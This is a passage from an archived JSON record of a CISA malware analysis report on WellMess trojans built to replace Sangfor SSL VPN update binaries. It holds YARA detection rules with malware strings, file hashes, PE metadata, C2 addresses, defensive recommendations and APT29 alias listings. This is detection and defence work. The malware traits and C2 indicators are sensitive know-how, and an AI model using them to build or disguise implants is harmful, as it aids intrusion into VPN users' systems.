\"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\n    MD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nstrings:\r\n    $0 = 
\"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 12 of 19\n\n$9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\n    $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\n    $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\n    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\n    $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 
3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2019-03-01 10:20:20-05:00\r\nImport Hash daf2da52475fd8981b19ec3c321a983c\r\nCompany Name Sangfor Technologies Co.,Ltd\r\nFile Description SangforUD\r\nInternal Name SangforUD.exe\r\nLegal Copyright Copyright (C) 2015\r\nOriginal Filename SangforUD.EXE\r\nProduct Name SangforUD application\r\nProduct Version 7.6.0.100\r\nPE Sections\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 13 of 19\n\nMD5 Name Raw Size Entropy\r\n1cd19b3151a670e3d1d2a24953392004 header 1024 3.025361\r\n98e91043bf45d10a621d72a2e3200ed0 .text 232960 6.609761\r\naa6f1abb810df36035bc35cf27c68d59 .rdata 72704 5.619637\r\nc947f4e73cc3503e16ce6173df639c87 .data 4608 3.792666\r\n1f354d76203061bfdd5a53dae48d5435 .tls 512 0.020393\r\nec6c94b5135c0c75d0a8b7288b77cbae .rsrc 103936 3.885931\r\nb744db87f1a59d6af2a5a37c0da519d1 .reloc 12288 6.571358\r\nPackers/Compilers/Cryptors\r\nRelationships\r\n58d8e65976... Connected_To 103.216.221.19\r\nDescription\r\nThis file is a 32-bit Windows executable and is similar in design and structure to the file\r\n65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75. This application is also designed to replace\r\nthe update binaries served out from Sangfor SSL VPN devices. 
This malware uses the hard-coded C2 IP address\r\n103.216.221.19 to download additional payloads.\r\na4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\r\nTags\r\ntrojan\r\nDetails\r\nName a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\r\nSize 434688 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 a32e1202257a2945bf0f878c58490af8\r\nSHA1 416df2d22338f412571cdaedb40ab33eb38977af\r\nSHA256 a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\r\nSHA512 92ac91e36fc9a8463b2a7b00e6dba687e86a15484d836cb2c8d399d76cd012b71523a9ddae43d9795e2c14fdb7ccc2137d668f7c691b47a2\r\nssdeep 6144:4t4156qfXqT02bFXCYv123kUo4GECAOcL6xDE4U:oc6qkt5vdU6ECe4U\r\nEntropy 6.203383\r\nAntivirus\r\nAhnlab Malware/Win32.Generic\r\nAntiy GrayWare/Win32.Uwasson\r\nESET Win32/Spy.Agent.PXZ trojan\r\nIkarus Trojan-Spy.Agent\r\nK7 Riskware ( 0040eff71 )\r\nMcAfee RDN/Generic.cf\r\nMicrosoft Security Essentials Trojan:Win32/Occamy.C\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 14 of 19\n\nNetGate Trojan.Win32.Malware\r\nVirusBlokAda Trojan.Agentb\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\n    Actor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\n    SHA256_3 = \"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\n    SHA256_4 = 
\"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\n    SHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\n    MD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\n    MD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 15 of 19\n\nstrings:\r\n    $0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\n    $9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 
63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\n    $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\n    $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\n    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\n    $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2018-03-12 10:02:59-04:00\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 16 of 19\n\nImport Hash a723dab3d5a36cc8ad0ef65a0d4cfb3d\r\nCompany Name Sangfor Technologies Co.,Ltd\r\nFile Description SangforUD\r\nInternal Name SangforUD.exe\r\nLegal Copyright Copyright (C) 
2015\r\nOriginal Filename SangforUD.EXE\r\nProduct Name SangforUD application\r\nProduct Version 7.6.0.100\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\ned096fa6a0d25049398750d840d02748 header 1024 3.038012\r\n0f2de5a1546886f5cb9876d918d333bf .text 238080 6.593105\r\n398a48e3a63f160340ba9720a3f13bc8 .rdata 73728 5.589507\r\n6f25e38b602834c202db365468104061 .data 4608 3.709410\r\n1f354d76203061bfdd5a53dae48d5435 .tls 512 0.020393\r\n093889615fb3f28b9066f7dc93650099 .rsrc 103936 3.885922\r\nd404cb13c9f033a5b71c2d31cf474e6f .reloc 12800 6.522532\r\nPackers/Compilers/Cryptors\r\nRelationships\r\na4b790ddff... Connected_To 192.168.169.103\r\nDescription\r\nThis file is a 32-bit Windows executable and is similar in design and structure to the file\r\n65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75. This application is also designed to replace\r\nthe update binaries served from Sangfor SSL VPN devices. It uses the private IP address 192.168.169.103 as a C2 server. Because this address falls in the RFC 1918 range it is not Internet-routable and should not be treated as an external network indicator or added to perimeter block lists; it may reflect a test build or an internal pivot host, which this report does not determine, so detection for this sample should rely on the file hashes and the YARA rule above rather than on the address.\r\n192.168.169.103\r\nWhois\r\nQueried whois.arin.net with \"n 192.168.169.103\"...\r\nNetRange:     192.168.0.0 - 192.168.255.255\r\nCIDR:         192.168.0.0/16\r\nNetName:        PRIVATE-ADDRESS-CBLK-RFC1918-IANA-RESERVED\r\nNetHandle:     NET-192-168-0-0-1\r\nParent:         NET192 (NET-192-0-0-0-0)\r\nNetType:        IANA Special Use\r\nOrganization: Internet Assigned Numbers Authority (IANA)\r\nRegDate:        1994-03-15\r\nUpdated:        2013-08-30\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 17 of 19\n\nComment:        These addresses are in use by many millions of independently operated networks, which might be as small as\r\na single computer connected to a home gateway, and are automatically configured in hundreds of millions of devices. 
They\r\nare only intended for use within a private context and traffic that needs to cross the Internet will need to use a different,\r\nunique address.\r\nComment:        These addresses can be used by anyone without any need to coordinate with IANA or an Internet registry.\r\nThe traffic from these addresses does not come from ICANN or IANA. We are not the source of activity you may see on\r\nlogs or in e-mail records. Please refer to http://www.iana.org/abuse/answers\r\nComment:        These addresses were assigned by the IETF, the organization that develops Internet protocols, in the Best\r\nCurrent Practice document, RFC 1918 which can be found at:\r\nComment:        http://datatracker.ietf.org/doc/rfc1918\r\nRef:            https://rdap.arin.net/registry/ip/192.168.0.0\r\nOrgName:        Internet Assigned Numbers Authority\r\nOrgId:         IANA\r\nAddress:        12025 Waterfront Drive\r\nAddress:        Suite 300\r\nCity:         Los Angeles\r\nStateProv:     CA\r\nPostalCode:     90292\r\nCountry:        US\r\nUpdated:        2012-08-31\r\nRef:            https://rdap.arin.net/registry/entity/IANA\r\nRelationships\r\n192.168.169.103 Connected_From a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\r\nDescription\r\na4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064 attempts to connect to the private IP address.\r\nRelationship Summary\r\n65495d173e... Connected_To 103.216.221.19\r\n103.216.221.19 Connected_From 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\r\n103.216.221.19 Connected_From 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\r\n58d8e65976... Connected_To 103.216.221.19\r\na4b790ddff... 
Connected_To 192.168.169.103\r\n192.168.169.103 Connected_From a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nFor the samples analyzed in this report, which carry Sangfor version metadata (SangforUD.exe) and are built to replace the client update binaries served by Sangfor SSL VPN devices, the most direct check is to compare the update binaries those devices serve against the vendor-supplied originals and against the SHA256 hashes and YARA rule in this report, and to hunt for connections to 103.216.221.19 (the 192.168.169.103 address is RFC 1918 and is not usable as an external indicator).\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 18 of 19\n\nRestrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 
800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nRevisions\r\nJuly 16, 2020: Initial Version\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 19 of 19",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a"
	],
	"report_names": [
		"ar20-198a"
	],
	"threat_actors": [
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434481,
	"ts_updated_at": 1775826719,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/448f393460de04c59c1205a79cf61e1ee1d6909f.pdf",
		"text": "https://archive.orkl.eu/448f393460de04c59c1205a79cf61e1ee1d6909f.txt",
		"img": "https://archive.orkl.eu/448f393460de04c59c1205a79cf61e1ee1d6909f.jpg"
	}
}